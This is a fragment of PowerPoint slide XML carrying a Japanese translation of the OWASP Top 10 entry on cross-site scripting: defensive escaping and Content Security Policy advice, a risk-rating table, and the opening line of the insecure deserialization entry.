              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>に悪用されうるデータを自動的にエスケープするよう設計されたフレームワークを使用する。各フレームワークにおける</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>対策の限界を確認し、対策の範囲外となるデータ使用については、適切な処理を行う。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="1" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ボディ、属性、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript、CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>など</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>出力のコンテキストに基づいて、信頼出来ない</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>リクエストデータをエスケープすることで、リフレクテッドおよびストアド</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>脆弱性を解消できる。要求されるデータの詳細なエスケープ手法は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet ‘XSS Prevention‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を参照のこと。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>クライアント側でのブラウザドキュメント改変時に、コンテキスト依存のエンコーディングを適用することで、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ベース</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>への対策となる。これが行えない場合には、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'DOM based XSS Prevention‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>で説明されている、同様のコンテキスト依存のエスケープ手法をブラウザ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>に適用することもできる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>に対する多層防御措置の一環として</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を有効に設定する。これは、ローカルファイルインクルードを介して悪意のあるコードを設置可能にする他の脆弱性（例：パストラバーサルを悪用したファイルの上書き、許可されたコンテンツ配信ネットワークから提供された脆弱なライブラリ等）が存在しない場合に効果的である。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>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A7</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クロスサイトスクリプティング</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1526817138"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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0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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>検出のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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altLang="ja-JP" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>種類の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>はいずれも、自動化ツールを用いて検出および悪用することが可能です。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>また、誰でも入手できる、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>を悪用するためのフレームワークも複数存在します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>の中では</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>番目に多く見られる問題であり、アプリケーション全体のおよそ三分の二で検出されます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>自動化ツールで、いくつかの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>問題を検出できます。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PHP、J2EE/JSP、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>または</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ASP.NET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>のような成熟した技術においては、特にそれが顕著です。</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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>の影響は、リフレクテッドおよび</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DOM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ベースの場合は中程度、ストアドの場合は重大となります。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>具体的な被害例として、被害者のブラウザ上でリモートコードが実行されることによる、認証情報やセッションの奪取、被害者へのマルウェア感染が挙げられます。</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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻撃者により供給された悪意を持った、あるいは改ざんされたオブジェクトのデシリアライズにより、アプリケーションと</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>は脆弱になります。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
